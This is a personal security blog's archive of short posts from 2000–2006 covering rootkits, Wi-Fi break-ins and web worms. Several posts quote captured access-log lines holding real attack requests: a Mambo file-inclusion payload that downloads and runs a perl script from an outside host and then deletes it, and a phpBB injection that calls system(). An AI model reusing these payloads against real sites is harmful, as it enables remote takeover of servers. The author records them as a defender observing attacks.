Fun story: Peter Cochrane's Blog: Snooping on a BlackBerry fool. Peter Cochrane writes about being on a train and being able to listen in to half of a (loud) pre-sales meeting call, with all details being shouted into the train carriage for everyone to enjoy. A bit of very British humour in it, and a good story about both the annoyance of mobile phones in public places and the privacy/security implications. Found via Bruce Schneier: The Analog Hole / security risks of talking loudly.
2006-02-19 (#)
And 52 hours after my afterthought about mentioning the magic phrase for a web worm the first attempt: h58737.serverkompetenz.net - - [18/Feb/2006:23:49:09 +0100] "GET /index.php?_REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://www.microsofti.li/tool.gif?& cmd=cd%20/tmp/;lwp-download%20http://www.microsofti.li/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*? HTTP/1.0" 200 3090 "-" "Mozilla/5.0"
2006-02-16 (#)
Finally fetched the source of the mambo exploit I mentioned before. It does a Google search for "by mambo" and this phrase can be found using google on The Virtual Bookcase exactly once, in the page about Books by Mambo Ama Mazama. Interesting source to read.. a bit of php which calls itself Defacing Tool 2.0 by r3v3ng4ns and a bit of perl which starts an ircbot on server bsd.cuti.cz which allows the usual stuff like taking over the machine and doing portscans. Afterthought: will this host now also get hit because it contains the magic phrase?
2006-02-14 (#)
On The Virtual Bookcase I get loads and loads of requests looking like (broken up for readability): "GET /book/byauthor/index.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt ?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt; perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0" 404 2348 "-" "Mozilla/5.0". All fail ofcourse (that's how I notice them). It seems this is a Mambo exploit in use. Funny thing is I never use Mambo on any site.
I have tried several times to get that tool25.txt to have a look, but it always returns 'The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later.'
2005-12-21 (#)
I wrote a bit about how I configure OpenSSH to make it less susceptible to break-in via password guessing.
2005-12-07 (#)
Doing the rounds, a really great story about a guy stopping a filesharer hogging the wireless network in a hotel. Also makes you think about (lack of) wireless network security and/or certain operating systems more than willing to share information about you.
2005-11-04 (#)
Good article in Wired: The Cover-Up Is the Crime, about the rootkit installed by a Sony audio CD with copy protection. Sony tries to focus on the file hiding bit with making fixes available, but as Wired (and others) write: Sony is breaking into your computer, tresspassing. Also a good comment in Freedom to Tinker, and seen in The Register: Removing Sony's CD 'rootkit' kills Windows.
2005-09-20 (#)
Found this article Finns urge better Wi-Fi security after bank break-in where a bank computer was broken into via an open wi-fi access point (and the original person breaking in traced via the mac address of his wi-fi card). Source: WifiNetNews article.
2005-09-13 (#)
Borrowed a Bol (Dutch on-line bookstore) url from irc, and was able to shop in the same session and adjust the content of the shopping cart upwards. Someone else borrowed the same url and got his name attached to the session. Lousy security for an on-line store...
2005-08-02 (#)
PC-Crash sorgte für Megastau (PC-crashed caused major traffic jam) A crashed PC in the traffic light control system for the Elbe tunnel in Hamburg, Germany kept 2 (out of 4) tunnels closed for hours which led to long traffic jams. Running windows? Probably, the firm delivering the control software is a windows shop. Found through comp.risks 23.95
2005-05-17 (#)
Mentioning phpbb on my homepage makes for interesting logentries. A perl worm searching for vulnerable phpbb installs was trying to install an irc bot talking to eu.undernet.org
2005-05-04 (#)
A new Windows Outlook virus is doing the rounds and I get to enjoy the bounces (I ranted about before and ranted about McAfee specifically again) again. Brian Martin wrote a nice article - rant about it too. Symantec antivirus has fixed this problem.
2005-03-18 (#)
A teacher asked for a directory on https://wwwsec.cs.uu.nl/ to be limited to a specific client certificate. Configuring this exact limitation turned out to be quite some searching as I couldn't find it in the modssl documentation (the site being down a lot of the time this week didn't help either). The correct way to write that you want to limit to a certain subject DN turns out to be: %{SSL_CLIENT_S_DN} eq "/C=NL/ST=Utrecht/L=Utrecht/O=Universiteit Utrecht/... "
2005-01-03 (#)
The phpbb vulnerability showing up before got even turned into a worm named the Santy worm (zdnet article) which automatically defaced sites running phpbb. Details of Santy worm at Symantec.
2004-11-25 (#)
Yes, phpbb had a security problem. Again. Because I want something resembling a working webforum on Camp Wireless I now run php in safe_mode.
2004-11-23 (#)
Interesting what you can see in a web access log: 201.9.255.250 - - [23/Nov/2004:17:19:28 +0100] "GET /forum/viewtopic.php?t=12&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.0" 200 15071 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)". Guess phpBB has a problem...
2004-11-15 (#)
Afgelopen weekend HCC dagen. Op de PCgg stand gespeeld met driftnet met output naar een videoprojector. Het algemene beeld is toch wel dat de beurs minder groot en minder druk was dan voorgaande jaren.
2000-07-21 (#)
Filter ruleset to make sendmail filter out the Outlook date header overflow exploit
⇐ Newer news items for tag security